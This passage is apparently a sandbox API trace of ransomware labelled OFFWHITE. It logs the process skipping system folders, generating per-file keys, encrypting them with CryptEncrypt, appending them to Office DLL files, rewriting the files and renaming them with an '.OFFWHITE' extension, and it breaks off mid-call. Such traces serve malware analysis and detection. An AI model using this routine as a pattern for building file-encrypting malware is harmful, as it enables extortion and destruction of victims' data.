(lpString1="STINTL.DLL.trx_dll", lpString2="programdata") returned 1 [0145.100] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2="appdata") returned 1 [0145.100] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2="program files") returned 1 [0145.100] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2="program files (x86)") returned 1 [0145.100] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\" [0145.100] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpString2="STINTL.DLL.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\STINTL.DLL.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\STINTL.DLL.trx_dll" [0145.100] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.100] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.100] PathFindExtensionW (pszPath="STINTL.DLL.trx_dll") returned=".trx_dll" [0145.100] lstrcmpiW (lpString1=".trx_dll", lpString2=".exe") returned 1 [0145.100] lstrcmpiW (lpString1=".trx_dll", lpString2=".log") returned 1 [0145.100] lstrcmpiW (lpString1=".trx_dll", lpString2=".cab") returned 1 [0145.100] lstrcmpiW (lpString1=".trx_dll", lpString2=".cmd") returned 1 [0145.100] lstrcmpiW (lpString1=".trx_dll", lpString2=".com") returned 1 [0145.100] lstrcmpiW (lpString1=".trx_dll", lpString2=".cpl") returned 1 [0145.100] lstrcmpiW (lpString1=".trx_dll", lpString2=".ini") returned 1 [0145.100] lstrcmpiW (lpString1=".trx_dll", lpString2=".dll") returned 1 [0145.100] lstrcmpiW (lpString1=".trx_dll", lpString2=".url") returned -1 [0145.100] lstrcmpiW (lpString1=".trx_dll", lpString2=".ttf") returned -1 [0145.100] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp3") returned 1 [0145.100] lstrcmpiW (lpString1=".trx_dll", lpString2=".pif") returned 1 [0145.101] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp4") returned 1 [0145.101] lstrcmpiW (lpString1=".trx_dll", lpString2=".OFFWHITE") returned 1 [0145.101] lstrcmpiW (lpString1=".trx_dll", lpString2=".msi") returned 1 [0145.101] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0145.101] GetProcessHeap () returned 0x500000 [0145.101] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52eb40 [0145.101] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\STINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\stintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0145.102] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=16736) returned 1 [0145.102] GetProcessHeap () returned 0x500000 [0145.102] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546a10 [0145.102] GetProcessHeap () returned 0x500000 [0145.102] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5469f8 [0145.102] GetProcessHeap () returned 0x500000 [0145.102] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fd88 [0145.102] GetProcessHeap () returned 0x500000 [0145.102] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fc80 [0145.102] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.102] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.102] SystemFunction036 (in: RandomBuffer=0x546a10, RandomBufferLength=0x10 | out: RandomBuffer=0x546a10) returned 1 [0145.102] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.102] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.102] SystemFunction036 (in: RandomBuffer=0x5469f8, RandomBufferLength=0x10 | out: RandomBuffer=0x5469f8) returned 1 [0145.103] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.103] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.103] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fd88*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x55fd88*, pdwDataLen=0x295cf90*=0x100) returned 1 [0145.103] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.103] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.103] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fc80*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55fc80*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0145.103] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x4160, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.103] SetLastError (dwErrCode=0x0) [0145.103] WriteFile (in: hFile=0x218, lpBuffer=0x55fd88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fd88*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0145.106] GetLastError () returned 0x0 [0145.106] GetLastError () returned 0x0 [0145.106] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x4260, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.106] WriteFile (in: hFile=0x218, lpBuffer=0x55fc80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fc80*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0145.106] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x4360, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.106] WriteFile (in: hFile=0x218, lpBuffer=0x52eb40*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x52eb40*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0145.106] GetProcessHeap () returned 0x500000 [0145.106] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x4160) returned 0x5607c8 [0145.106] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.106] ReadFile (in: hFile=0x218, lpBuffer=0x5607c8, nNumberOfBytesToRead=0x4160, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesRead=0x295d1c0*=0x4160, lpOverlapped=0x0) returned 1 [0145.108] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.108] WriteFile (in: hFile=0x218, lpBuffer=0x5607c8*, nNumberOfBytesToWrite=0x4160, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesWritten=0x295d1cc*=0x4160, lpOverlapped=0x0) returned 1 [0145.108] GetProcessHeap () returned 0x500000 [0145.108] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5607c8 | out: hHeap=0x500000) returned 1 [0145.108] CloseHandle (hObject=0x218) returned 1 [0145.108] GetProcessHeap () returned 0x500000 [0145.108] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fd88 | out: hHeap=0x500000) returned 1 [0145.108] GetProcessHeap () returned 0x500000 [0145.108] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fc80 | out: hHeap=0x500000) returned 1 [0145.108] GetProcessHeap () returned 0x500000 [0145.108] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546a10 | out: hHeap=0x500000) returned 1 [0145.108] GetProcessHeap () returned 0x500000 [0145.108] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5469f8 | out: hHeap=0x500000) returned 1 [0145.108] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\STINTL.DLL.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\STINTL.DLL.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\STINTL.DLL.trx_dll" [0145.109] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\STINTL.DLL.trx_dll", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\STINTL.DLL.trx_dll.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\STINTL.DLL.trx_dll.OFFWHITE" [0145.109] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\STINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\stintl.dll.trx_dll"), lpNewFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\STINTL.DLL.trx_dll.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\stintl.dll.trx_dll.offwhite")) returned 1 [0145.109] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbf706700, ftCreationTime.dwHighDateTime=0x1cac81a, ftLastAccessTime.dwLowDateTime=0xef0a44f0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xbf706700, ftLastWriteTime.dwHighDateTime=0x1cac81a, nFileSizeHigh=0x0, nFileSizeLow=0x6960, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="VISBRRES.DLL.trx_dll", cAlternateFileName="VISBRR~1.TRX")) returned 1 [0145.109] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2=".") returned 1 [0145.109] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2="..") returned 1 [0145.109] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2="...") returned 1 [0145.109] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2="windows") returned -1 [0145.109] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2="$recycle.bin") returned 1 [0145.109] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2="rsa") returned 1 [0145.109] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2="ntuser.dat") returned 1 [0145.109] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2="programdata") returned 1 [0145.110] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2="appdata") returned 1 [0145.110] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2="program files") returned 1 [0145.110] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2="program files (x86)") returned 1 [0145.110] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\" [0145.110] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpString2="VISBRRES.DLL.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\VISBRRES.DLL.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\VISBRRES.DLL.trx_dll" [0145.110] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.110] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.110] PathFindExtensionW (pszPath="VISBRRES.DLL.trx_dll") returned=".trx_dll" [0145.110] lstrcmpiW (lpString1=".trx_dll", lpString2=".exe") returned 1 [0145.110] lstrcmpiW (lpString1=".trx_dll", lpString2=".log") returned 1 [0145.110] lstrcmpiW (lpString1=".trx_dll", lpString2=".cab") returned 1 [0145.110] lstrcmpiW (lpString1=".trx_dll", lpString2=".cmd") returned 1 [0145.110] lstrcmpiW (lpString1=".trx_dll", lpString2=".com") returned 1 [0145.110] lstrcmpiW (lpString1=".trx_dll", lpString2=".cpl") returned 1 [0145.110] lstrcmpiW (lpString1=".trx_dll", lpString2=".ini") returned 1 [0145.110] lstrcmpiW (lpString1=".trx_dll", lpString2=".dll") returned 1 [0145.110] lstrcmpiW (lpString1=".trx_dll", lpString2=".url") returned -1 [0145.110] lstrcmpiW (lpString1=".trx_dll", lpString2=".ttf") returned -1 [0145.110] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp3") returned 1 [0145.110] lstrcmpiW (lpString1=".trx_dll", lpString2=".pif") returned 1 [0145.110] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp4") returned 1 [0145.110] lstrcmpiW (lpString1=".trx_dll", lpString2=".OFFWHITE") returned 1 [0145.110] lstrcmpiW (lpString1=".trx_dll", lpString2=".msi") returned 1 [0145.110] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0145.110] GetProcessHeap () returned 0x500000 [0145.110] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52eb50 [0145.111] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\VISBRRES.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\visbrres.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0145.114] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=26976) returned 1 [0145.114] GetProcessHeap () returned 0x500000 [0145.114] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5469f8 [0145.114] GetProcessHeap () returned 0x500000 [0145.114] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546a10 [0145.114] GetProcessHeap () returned 0x500000 [0145.114] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fc80 [0145.114] GetProcessHeap () returned 0x500000 [0145.114] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fd88 [0145.114] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.114] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.114] SystemFunction036 (in: RandomBuffer=0x5469f8, RandomBufferLength=0x10 | out: RandomBuffer=0x5469f8) returned 1 [0145.114] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.114] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.114] SystemFunction036 (in: RandomBuffer=0x546a10, RandomBufferLength=0x10 | out: RandomBuffer=0x546a10) returned 1 [0145.114] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.114] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.114] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fc80*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x55fc80*, pdwDataLen=0x295cf90*=0x100) returned 1 [0145.114] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.114] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.115] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fd88*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55fd88*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0145.115] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x6960, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.115] SetLastError (dwErrCode=0x0) [0145.115] WriteFile (in: hFile=0x218, lpBuffer=0x55fc80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fc80*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0145.117] GetLastError () returned 0x0 [0145.117] GetLastError () returned 0x0 [0145.117] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x6a60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.117] WriteFile (in: hFile=0x218, lpBuffer=0x55fd88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fd88*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0145.117] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x6b60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.117] WriteFile (in: hFile=0x218, lpBuffer=0x52eb50*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x52eb50*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0145.117] GetProcessHeap () returned 0x500000 [0145.117] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x6960) returned 0x5607c8 [0145.117] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.117] ReadFile (in: hFile=0x218, lpBuffer=0x5607c8, nNumberOfBytesToRead=0x6960, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesRead=0x295d1c0*=0x6960, lpOverlapped=0x0) returned 1 [0145.120] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.120] WriteFile (in: hFile=0x218, lpBuffer=0x5607c8*, nNumberOfBytesToWrite=0x6960, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesWritten=0x295d1cc*=0x6960, lpOverlapped=0x0) returned 1 [0145.120] GetProcessHeap () returned 0x500000 [0145.120] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5607c8 | out: hHeap=0x500000) returned 1 [0145.120] CloseHandle (hObject=0x218) returned 1 [0145.120] GetProcessHeap () returned 0x500000 [0145.120] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fc80 | out: hHeap=0x500000) returned 1 [0145.120] GetProcessHeap () returned 0x500000 [0145.120] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fd88 | out: hHeap=0x500000) returned 1 [0145.120] GetProcessHeap () returned 0x500000 [0145.120] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5469f8 | out: hHeap=0x500000) returned 1 [0145.120] GetProcessHeap () returned 0x500000 [0145.120] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546a10 | out: hHeap=0x500000) returned 1 [0145.120] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\VISBRRES.DLL.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\VISBRRES.DLL.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\VISBRRES.DLL.trx_dll" [0145.120] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\VISBRRES.DLL.trx_dll", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\VISBRRES.DLL.trx_dll.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\VISBRRES.DLL.trx_dll.OFFWHITE" [0145.121] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\VISBRRES.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\visbrres.dll.trx_dll"), lpNewFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\VISBRRES.DLL.trx_dll.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\visbrres.dll.trx_dll.offwhite")) returned 1 [0145.121] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6a315700, ftCreationTime.dwHighDateTime=0x1cac814, ftLastAccessTime.dwLowDateTime=0xef0a44f0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x6a315700, ftLastWriteTime.dwHighDateTime=0x1cac814, nFileSizeHigh=0x0, nFileSizeLow=0x77560, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="VISINTL.DLL.trx_dll", cAlternateFileName="VISINT~1.TRX")) returned 1 [0145.121] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2=".") returned 1 [0145.121] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2="..") returned 1 [0145.121] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2="...") returned 1 [0145.121] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2="windows") returned -1 [0145.121] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2="$recycle.bin") returned 1 [0145.121] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2="rsa") returned 1 [0145.121] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2="ntuser.dat") returned 1 [0145.121] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2="programdata") returned 1 [0145.122] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2="appdata") returned 1 [0145.122] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2="program files") returned 1 [0145.122] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2="program files (x86)") returned 1 [0145.122] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\" [0145.122] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpString2="VISINTL.DLL.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\VISINTL.DLL.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\VISINTL.DLL.trx_dll" [0145.122] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.122] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.122] PathFindExtensionW (pszPath="VISINTL.DLL.trx_dll") returned=".trx_dll" [0145.122] lstrcmpiW (lpString1=".trx_dll", lpString2=".exe") returned 1 [0145.122] lstrcmpiW (lpString1=".trx_dll", lpString2=".log") returned 1 [0145.122] lstrcmpiW (lpString1=".trx_dll", lpString2=".cab") returned 1 [0145.122] lstrcmpiW (lpString1=".trx_dll", lpString2=".cmd") returned 1 [0145.122] lstrcmpiW (lpString1=".trx_dll", lpString2=".com") returned 1 [0145.122] lstrcmpiW (lpString1=".trx_dll", lpString2=".cpl") returned 1 [0145.122] lstrcmpiW (lpString1=".trx_dll", lpString2=".ini") returned 1 [0145.122] lstrcmpiW (lpString1=".trx_dll", lpString2=".dll") returned 1 [0145.122] lstrcmpiW (lpString1=".trx_dll", lpString2=".url") returned -1 [0145.122] lstrcmpiW (lpString1=".trx_dll", lpString2=".ttf") returned -1 [0145.122] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp3") returned 1 [0145.122] lstrcmpiW (lpString1=".trx_dll", lpString2=".pif") returned 1 [0145.122] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp4") returned 1 [0145.122] lstrcmpiW (lpString1=".trx_dll", lpString2=".OFFWHITE") returned 1 [0145.122] lstrcmpiW (lpString1=".trx_dll", lpString2=".msi") returned 1 [0145.122] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0145.122] GetProcessHeap () returned 0x500000 [0145.122] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52eb60 [0145.122] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\VISINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\visintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0145.123] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=488800) returned 1 [0145.123] GetProcessHeap () returned 0x500000 [0145.123] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546a10 [0145.123] GetProcessHeap () returned 0x500000 [0145.123] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5469f8 [0145.123] GetProcessHeap () returned 0x500000 [0145.123] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fd88 [0145.123] GetProcessHeap () returned 0x500000 [0145.123] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fc80 [0145.123] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.123] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.123] SystemFunction036 (in: RandomBuffer=0x546a10, RandomBufferLength=0x10 | out: RandomBuffer=0x546a10) returned 1 [0145.123] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.123] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.123] SystemFunction036 (in: RandomBuffer=0x5469f8, RandomBufferLength=0x10 | out: RandomBuffer=0x5469f8) returned 1 [0145.123] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.123] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.123] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fd88*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x55fd88*, pdwDataLen=0x295cf90*=0x100) returned 1 [0145.124] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.125] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.125] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fc80*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55fc80*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0145.125] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x77560, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.126] SetLastError (dwErrCode=0x0) [0145.126] WriteFile (in: 